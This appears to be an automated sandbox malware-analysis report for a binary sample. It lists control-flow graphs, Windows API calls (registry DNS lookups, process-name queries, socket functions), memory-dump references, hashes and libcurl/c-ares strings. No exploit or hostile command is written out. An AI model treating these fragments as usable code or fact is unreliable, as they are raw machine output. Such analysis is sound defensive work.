                                                              control_flow_graph 1395 7c29ff-7c2a2f FindFirstFileA 1396 7c2a38 1395->1396 1397 7c2a31-7c2a36 1395->1397 1398 7c2a3d-7c2a91 call c41150 call c411e0 RegOpenKeyExA 1396->1398 1397->1398 1403 7c2a9a 1398->1403 1404 7c2a93-7c2a98 1398->1404 1405 7c2a9f-7c2b0c call c41150 call c411e0 CharUpperA call b48da0 1403->1405 1404->1405 1413 7c2b0e-7c2b13 1405->1413 1414 7c2b15 1405->1414 1415 7c2b1a-7c2b92 call c41150 call c411e0 call b48e80 call b48e70 1413->1415 1414->1415 1424 7c2bcc-7c2c66 QueryFullProcessImageNameA CloseHandle call b48da0 1415->1424 1425 7c2b94-7c2ba3 1415->1425 1435 7c2c6f 1424->1435 1436 7c2c68-7c2c6d 1424->1436 1428 7c2ba5-7c2bae 1425->1428 1429 7c2bb0-7c2bc0 call b48e68 1425->1429 1428->1424 1432 7c2bc5-7c2bca 1429->1432 1432->1424 1432->1425 1437 7c2c74-7c2ce9 call c41150 call c411e0 call b48e80 call b48e70 1435->1437 1436->1437 1446 7c2dcf-7c2e1c call c41150 call c411e0 CloseHandle 1437->1446 1447 7c2cef-7c2d49 call b48bb0 call b48da0 1437->1447 1457 7c2e23-7c2e2e 1446->1457 1460 7c2d99-7c2dad 1447->1460 1461 7c2d4b-7c2d63 call b48da0 1447->1461 1458 7c2e37 1457->1458 1459 7c2e30-7c2e35 1457->1459 1462 7c2e3c-7c2ed6 call c41150 call c411e0 1458->1462 1459->1462 1460->1446 1461->1460 1468 7c2d65-7c2d7d call b48da0 1461->1468 1477 7c2ed8-7c2ee1 1462->1477 1478 7c2eea 1462->1478 1468->1460 1473 7c2d7f-7c2d97 call b48da0 1468->1473 1473->1460 1479 7c2daf-7c2dc9 call b48e68 1473->1479 1477->1478 1480 7c2ee3-7c2ee8 1477->1480 1481 7c2eef-7c2f16 call c41150 call c411e0 1478->1481 1479->1446 1479->1447 1480->1481
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 5e18397ceb18fff940a9056e3c0323b82d7c3859c9ef693dedc328123c9e8e90
                                                              • Instruction ID: d330aa43df5d7b4b49a61fea23b50b9075c8a58004e086eb8cfa2a3b3587e78e
                                                              • Opcode Fuzzy Hash: 5e18397ceb18fff940a9056e3c0323b82d7c3859c9ef693dedc328123c9e8e90
                                                              • Instruction Fuzzy Hash: 8EE1D1B09053099FCB10EF68D994A9DBBF4BB48344F10886DE8889B351E7789A859F52
                                                              Function 007D05B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1541 7d05b0-7d05b7 1542 7d05bd-7d05d4 1541->1542 1543 7d07ee 1541->1543 1544 7d05da-7d05e6 1542->1544 1545 7d07e7-7d07ed 1542->1545 1544->1545 1546 7d05ec-7d05f0 1544->1546 1545->1543 1547 7d07c7-7d07cc 1546->1547 1548 7d05f6-7d0620 call 7d7350 call 7c70b0 1546->1548 1547->1545 1553 7d066a-7d068c call 7fdec0 1548->1553 1554 7d0622-7d0624 1548->1554 1559 7d07d6-7d07e3 call 7d7380 1553->1559 1560 7d0692-7d06a0 1553->1560 1556 7d0630-7d0655 call 7c70d0 call 7d03c0 call 7d7450 1554->1556 1585 7d07ce 1556->1585 1586 7d065b-7d0668 call 7c70e0 1556->1586 1559->1545 1562 7d06f4-7d06f6 1560->1562 1563 7d06a2-7d06a4 1560->1563 1569 7d06fc-7d06fe 1562->1569 1570 7d07ef-7d082b call 7d3000 1562->1570 1567 7d06b0-7d06e4 call 7d73b0 1563->1567 1567->1559 1584 7d06ea-7d06ee 1567->1584 1574 7d072c-7d0754 1569->1574 1582 7d0a2f-7d0a35 1570->1582 1583 7d0831-7d0837 1570->1583 1575 7d075f-7d078b 1574->1575 1576 7d0756-7d075b 1574->1576 1598 7d0791-7d0796 1575->1598 1599 7d0700-7d0703 1575->1599 1580 7d075d 1576->1580 1581 7d0707-7d0719 WSAEventSelect 1576->1581 1589 7d0723-7d0726 1580->1589 1581->1559 1587 7d071f 1581->1587 1594 7d0a3c-7d0a52 1582->1594 1595 7d0a37-7d0a3a 1582->1595 1591 7d0839-7d084c call 7d6fa0 1583->1591 1592 7d0861-7d087e 1583->1592 1584->1567 1593 7d06f0 1584->1593 1585->1559 1586->1553 1586->1556 1587->1589 1589->1570 1589->1574 1607 7d0a9c-7d0aa4 1591->1607 1608 7d0852 1591->1608 1609 7d0882-7d088d 1592->1609 1593->1562 1594->1559 1596 7d0a58-7d0a81 call 7d2f10 1594->1596 1595->1594 1596->1559 1612 7d0a87-7d0a97 call 7d6df0 1596->1612 1598->1599 1602 7d079c-7d07c2 call 7c76a0 1598->1602 1599->1581 1602->1599 1607->1559 1608->1592 1614 7d0854-7d085f 1608->1614 1610 7d0970-7d0975 1609->1610 1611 7d0893-7d08b1 1609->1611 1617 7d0a19-7d0a2c 1610->1617 1618 7d097b-7d0989 call 7c70b0 1610->1618 1615 7d08c8-7d08f7 1611->1615 1612->1559 1614->1609 1624 7d08fd-7d0925 1615->1624 1625 7d08f9-7d08fb 1615->1625 1617->1582 1618->1617 1626 7d098f-7d099e 1618->1626 1628 7d0928-7d093f 1624->1628 1625->1628 1627 7d09b0-7d09c1 call 7c70d0 1626->1627 1632 7d09a0-7d09ae call 7c70e0 1627->1632 1633 7d09c3-7d09c7 1627->1633 1634 7d0945-7d096b 1628->1634 1635 7d08b3-7d08c2 1628->1635 1632->1617 1632->1627 1637 7d09e8-7d0a03 WSAEnumNetworkEvents 1633->1637 1634->1635 1635->1610 1635->1615 1639 7d0a05-7d0a17 1637->1639 1640 7d09d0-7d09e6 WSAEventSelect 1637->1640 1639->1640 1640->1632 1640->1637
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 007D0711
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 007D09DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 007D09FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N=|$multi.c
                                                              • API String ID: 2170980988-2293498705
                                                              • Opcode ID: 3f32086f42aa9a87b5987cfad9a7ef866af32c574a6b7f798b05ce03139e0301
                                                              • Instruction ID: f64b0e2a0af746ec0008185d7660d680154e0f868d16389521145abed6364641
                                                              • Opcode Fuzzy Hash: 3f32086f42aa9a87b5987cfad9a7ef866af32c574a6b7f798b05ce03139e0301
                                                              • Instruction Fuzzy Hash: 7BD19D756083019FEB10CF24C885BABBBF5FF94354F04982EF98496242E778E954DB92
                                                              Function 0088B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1712 88b180-88b195 1713 88b19b-88b1a2 1712->1713 1714 88b3e0-88b3e7 1712->1714 1715 88b1b0-88b1b9 1713->1715 1715->1715 1716 88b1bb-88b1bd 1715->1716 1716->1714 1717 88b1c3-88b1d0 1716->1717 1719 88b3db 1717->1719 1720 88b1d6-88b1f2 1717->1720 1719->1714 1721 88b229-88b22d 1720->1721 1722 88b3e8-88b417 1721->1722 1723 88b233-88b246 1721->1723 1731 88b41d-88b429 1722->1731 1732 88b582-88b589 1722->1732 1724 88b248-88b24b 1723->1724 1725 88b260-88b264 1723->1725 1726 88b24d-88b256 1724->1726 1727 88b215-88b223 1724->1727 1729 88b269-88b286 call 88af30 1725->1729 1726->1729 1727->1721 1730 88b315-88b33c call b48b00 1727->1730 1738 88b288-88b2a3 call 88b060 1729->1738 1739 88b2f0-88b301 1729->1739 1746 88b3bf-88b3ca 1730->1746 1747 88b342-88b347 1730->1747 1735 88b42b-88b433 call 88b590 1731->1735 1736 88b435-88b44c call 88b590 1731->1736 1735->1736 1749 88b458-88b471 call 88b590 1736->1749 1750 88b44e-88b456 call 88b590 1736->1750 1757 88b2a9-88b2c7 getsockname call 88b020 1738->1757 1758 88b200-88b213 call 88b020 1738->1758 1739->1727 1761 88b307-88b310 1739->1761 1751 88b3cc-88b3d9 1746->1751 1753 88b349-88b358 1747->1753 1754 88b384-88b38f 1747->1754 1770 88b48c-88b4a7 1749->1770 1771 88b473-88b487 1749->1771 1750->1749 1751->1714 1755 88b360-88b382 1753->1755 1754->1746 1756 88b391-88b3a5 1754->1756 1755->1754 1755->1755 1762 88b3b0-88b3bd 1756->1762 1768 88b2cc-88b2dd 1757->1768 1758->1727 1761->1751 1762->1746 1762->1762 1768->1727 1772 88b2e3 1768->1772 1773 88b4a9-88b4b1 call 88b660 1770->1773 1774 88b4b3-88b4cb call 88b660 1770->1774 1771->1732 1772->1761 1773->1774 1779 88b4d9-88b4f5 call 88b660 1774->1779 1780 88b4cd-88b4d5 call 88b660 1774->1780 1785 88b50d-88b52b call 88b770 * 2 1779->1785 1786 88b4f7-88b50b 1779->1786 1780->1779 1785->1732 1791 88b52d-88b531 1785->1791 1786->1732 1792 88b580 1791->1792 1793 88b533-88b53b 1791->1793 1792->1732 1794 88b578-88b57e 1793->1794 1795 88b53d-88b547 1793->1795 1794->1732 1795->1794 1796 88b549-88b54d 1795->1796 1796->1794 1797 88b54f-88b558 1796->1797 1797->1794 1798 88b55a-88b576 call 88b870 * 2 1797->1798 1798->1732 1798->1794
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 0088B2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: db7cd6461b19be421fc584f029af9ad1a28bc74b11a6d27cf2c82692fa69158a
                                                              • Instruction ID: 7f5c1b5f0fd3325efb51e599d9f1492e2126aee6edc7db51d13dc5575e2465a2
                                                              • Opcode Fuzzy Hash: db7cd6461b19be421fc584f029af9ad1a28bc74b11a6d27cf2c82692fa69158a
                                                              • Instruction Fuzzy Hash: 38C16D716043159FD718EF28C881A6AB7E1FFC9314F048969E849DB3A2EB31ED45CB81
                                                              Function 007D6FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33d043bb1becd44b1c6c656b4cd864c5606641fb59ef40534fcae261e1402dca
                                                              • Instruction ID: 9c3e239c7b33572b5e073deb133f79e4841b7fd8d435a0151f1fc3fe5e3c960f
                                                              • Opcode Fuzzy Hash: 33d043bb1becd44b1c6c656b4cd864c5606641fb59ef40534fcae261e1402dca
                                                              • Instruction Fuzzy Hash: 5E91F43060D3494BD7398A2888807BBB2F5FFC5364F548B2EE898432D4FB79AD40D691
                                                              Function 0088A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0087712E,?,?,?,00001001,00000000), ref: 0088A90D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: 84597768505dffa7bbecf08b942591b0663e94ca9d3e5220fc551168329a36a9
                                                              • Instruction ID: de3254ea7d12bf29d27fec290b224900bb0c0e29f6eea6f75083103126548907
                                                              • Opcode Fuzzy Hash: 84597768505dffa7bbecf08b942591b0663e94ca9d3e5220fc551168329a36a9
                                                              • Instruction Fuzzy Hash: 30F04975208308AFE210AA01DC84D6BBBEDFBC9758F05895DF958532119270AE108AB2
                                                              Function 075402BB Relevance: .8, Instructions: 826COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f32354fadf4376235e72d2d715b423bce65f7123bc3e2bab74dd6425a9cc35d
                                                              • Instruction ID: 4e04eb2a5a38c38f17d2a5991f37e09d98718122b0c5495480fa667579125f68
                                                              • Opcode Fuzzy Hash: 1f32354fadf4376235e72d2d715b423bce65f7123bc3e2bab74dd6425a9cc35d
                                                              • Instruction Fuzzy Hash: 5702E8F716C111BDB24282815B54BFB6B6EF7D7738F3088A6F60BD66C2E2980E491171
                                                              Function 07540BDB Relevance: .2, Instructions: 217COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1441141625.0000000007540000.00000040.00001000.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7540000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc8a9833660398cc89e1089f1c13014dae9a5bcf0f4425143c47c205646cd613
                                                              • Instruction ID: 8145ae9a79f3e5408140527d600440efc855c06e837e7eabecd713af753599f2
                                                              • Opcode Fuzzy Hash: cc8a9833660398cc89e1089f1c13014dae9a5bcf0f4425143c47c205646cd613
                                                              • Instruction Fuzzy Hash: 98410BFB14C010BDB59282416B54AFBAB7EF6C7734B3088AAF90BC5682E2D85F5D5031
                                                              Function 0087A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0087AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0087AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0087AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0087AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0087AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 0087AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0087AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0087AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0087AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 0087AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 0087ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 0087AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0087AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0087AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0087AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0087AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0087B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1426333607.00000000007C1000.00000040.00000001.01000000.00000004.sdmp, Offset: 007C0000, based on PE: true
                                                              • Associated: 00000001.00000002.1426313932.00000000007C0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F01000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1426333607.0000000000F03000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427581945.0000000000F06000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000000F08000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000119C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.00000000011A4000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.0000000001277000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000127F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1427600992.000000000128D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1430214790.000000000128E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1431718489.0000000001443000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1432958206.0000000001445000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.1433289138.0000000001446000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7c0000_t6VDbnvGeN.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: d7b1d14c792eb93bb7f784ce1643993050d646396a22f5c56fbc2e5f8667c0c2
                                                              • Instruction ID: 5a3df71f6e7df106a1a30ca52798221df4e4cf34c4e66f2904186f24b4f4dc2e
                                                              • Opcode Fuzzy Hash: d7b1d14c792eb93bb7f784ce1643993050d646396a22f5c56fbc2e5f8667c0c2
                                                              • Instruction Fuzzy Hash: 427280B1604341AFE7249B24CC81B6B77E8FF85704F148829F999DB291E771E944CBA3
                                                              Function 007FA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 007FA832
                                                              Strings
                                                              • @, xrefs: 007FAC42
                                                              • @, xrefs: 007FA8F4
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 007FAE1F
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 007FAE60
                                                              • Trying %s:%d..., xrefs: 007FA7C2, 007FA7DE
                                                              • bind failed with errno %d: %s, xrefs: 007FB080
                                                              • cf-socket.c, xrefs: 007FA5CD, 007FA735
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 007FA6CE
                                                              • Trying [%s]:%d..., xrefs: 007FA689
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 007FA796
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 007FAD0A
